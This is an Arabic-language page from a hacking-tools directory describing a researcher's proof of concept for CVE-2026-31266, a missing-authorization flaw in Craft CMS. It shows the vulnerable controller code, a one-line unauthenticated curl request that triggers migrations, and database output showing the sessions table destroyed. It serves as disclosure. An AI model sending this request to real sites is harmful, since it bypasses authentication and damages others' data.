Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/0xrixet/craftcms-poc-cve-2026-31266
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHub0xrixet/craftcms-poc-cve-2026-31266

Craftcms-PoC-CVE-2026-31266

بحث أمني حول آلية المصادقة في Craft CMS

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-31266 - نقص التفويض في Craft CMS

معلومات CVE

الحقلالقيمة
معرف CVECVE-2026-31266
البائعPixel & Tonic
المنتجCraft CMS
الإصدارات المتأثرة<= 5.9.5
CWECWE-862 (نقص التفويض)
CVSS7.3 (عالي)
باحث الأمن0xRIXET

محتويات الأدلة

  • screenshots/ - عروض إثبات المفهوم

الثغرة

  • النوع: نقص التفويض
  • التأثير: تجاوز المصادقة
  • البائع: Craft CMS
  • الحالة: CVE-2026-31266

الكود القابل للثغرة

الملف: src/controllers/AppController.php

الأسطر 65-68:

root@kitploit:~
protected array|bool|int $allowAnonymous = [
    'migrate' => self::ALLOW_ANONYMOUS_LIVE | self::ALLOW_ANONYMOUS_OFFLINE,
];

إثبات المفهوم

root@kitploit:~
# With allowAdminChanges=false
curl -X POST "http://target/actions/app/migrate"

الأدلة

قبل الهجوم:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
+----------+
| COUNT(*) |
+----------+
|        0 |
+----------+

بعد الهجوم:

root@kitploit:~
mysql> SELECT COUNT(*) FROM sessions;
ERROR 1146 (42S02): Table 'sessions' doesn't exist

المراجع

  • مستودع Craft CMS
  • وثائق أمان Craft
  • إدخال NVD

جهة الاتصال

  • باحث الأمن: 0xRIXET | محمد الشهري
  • تويتر | X : @0xRIXET
  • البريد الإلكتروني: [email protected]
تنزيل الأداة